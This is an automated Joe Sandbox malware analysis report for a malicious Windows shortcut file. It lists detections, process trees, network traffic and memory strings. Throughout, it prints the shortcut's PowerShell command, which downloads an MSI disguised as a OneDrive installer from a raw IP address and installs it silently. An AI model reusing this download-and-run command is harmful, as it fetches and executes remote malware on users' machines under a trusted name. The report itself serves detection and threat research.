Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GIjkGXNvza.lnk

Overview

General Information

Sample name:GIjkGXNvza.lnk
renamed because original name is a hash value
Original sample name:14d22921b1d69f92edd0bd8e2c8670bb65255cb9ca7cba185ad67ff03d27067b.lnk
Analysis ID:1606491
MD5:a91248afd36d314539e4268e66cdad96
SHA1:c0b620a1253b556af91dee3d88579534e698b235
SHA256:14d22921b1d69f92edd0bd8e2c8670bb65255cb9ca7cba185ad67ff03d27067b
Tags:5-45-94-1865-61-50-1775-61-58-167lnkuser-JAMESWT_MHT
Infos:

Detection

Score:72
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • powershell.exe (PID: 7264 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 7532 cmdline: "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Roaming\Install.msi /qn MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7564 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine|base64offset|contains: "{y^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, ProcessId: 7264, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine|base64offset|contains: "{y^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, ProcessId: 7264, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine|base64offset|contains: "{y^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, ProcessId: 7264, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine|base64offset|contains: "{y^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, ProcessId: 7264, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, CommandLine|base64offset|contains: "{y^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn, ProcessId: 7264, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-04T14:19:25.684814+010018100002Potentially Bad Traffic192.168.2.5497045.45.94.18680TCP
2025-02-04T14:19:27.320071+010018100002Potentially Bad Traffic192.168.2.5497055.45.94.18680TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: GIjkGXNvza.lnkVirustotal: Detection: 40%Perma Link
Source: GIjkGXNvza.lnkReversingLabs: Detection: 28%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2137428406.0000024D71C50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32oS Packet Scheduler-0000y source: powershell.exe, 00000000.00000002.2109165267.0000024D577B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000000.00000002.2109165267.0000024D577B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2137428406.0000024D71C50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D577B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbatj- source: powershell.exe, 00000000.00000002.2136379597.0000024D719FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbt source: powershell.exe, 00000000.00000002.2136379597.0000024D719FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2136379597.0000024D71AA9000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 5.45.94.186:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 5.45.94.186:80
Source: global trafficHTTP traffic detected: GET /download/OneDriveSetup.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 5.45.94.186Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download/OneDriveSetup.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 5.45.94.186Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: unknownTCP traffic detected without corresponding DNS query: 5.45.94.186
Source: global trafficHTTP traffic detected: GET /download/OneDriveSetup.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 5.45.94.186Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download/OneDriveSetup.msi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 5.45.94.186Connection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2109693324.0000024D5ADB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109693324.0000024D5A93B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.45.94.186
Source: powershell.exe, 00000000.00000002.2109693324.0000024D5ADD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D577F7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D577B7000.00000004.00000020.00020000.00000000.sdmp, GIjkGXNvza.lnkString found in binary or memory: http://5.45.94.186/download/OneDriveSetup.msi
Source: powershell.exe, 00000000.00000002.2109536061.0000024D57B20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2137428406.0000024D71C12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D57792000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109473710.0000024D579E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2137428406.0000024D71C86000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D577F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.45.94.186/download/OneDriveSetup.msi-OutFileC:
Source: powershell.exe, 00000000.00000002.2109165267.0000024D57862000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.45.94.186/download/OneDriveSetup.msiM
Source: powershell.exe, 00000000.00000002.2109536061.0000024D57B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.45.94.186/download/onedrivesetup.msi
Source: powershell.exe, 00000000.00000002.2109693324.0000024D5B150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2109693324.0000024D59A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2109693324.0000024D597E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2109693324.0000024D59A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2109693324.0000024D597E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2109693324.0000024D59A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2109693324.0000024D5A93B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2109693324.0000024D5B150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2132378508.0000024D69996000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Source: GIjkGXNvza.lnkLNK file: Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "%appdata%\Install.msi";msiexec.exe /i '%appdata%\Install.msi' /qn
Source: classification engineClassification label: mal72.winLNK@5/5@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3mdhl0l.1t1.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: GIjkGXNvza.lnkVirustotal: Detection: 40%
Source: GIjkGXNvza.lnkReversingLabs: Detection: 28%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Roaming\Install.msi /qn
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe" /i C:\Users\user\AppData\Roaming\Install.msi /qnJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2137428406.0000024D71C50000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32oS Packet Scheduler-0000y source: powershell.exe, 00000000.00000002.2109165267.0000024D577B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000000.00000002.2109165267.0000024D577B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2137428406.0000024D71C50000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2109165267.0000024D577B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbatj- source: powershell.exe, 00000000.00000002.2136379597.0000024D719FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbt source: powershell.exe, 00000000.00000002.2136379597.0000024D719FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2136379597.0000024D71AA9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest "http://5.45.94.186/download/OneDriveSetup.msi" -OutFile "C:\Users\user\AppData\Roaming\Install.msi";msiexec.exe /i 'C:\Users\user\AppData\Roaming\Install.msi' /qn

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
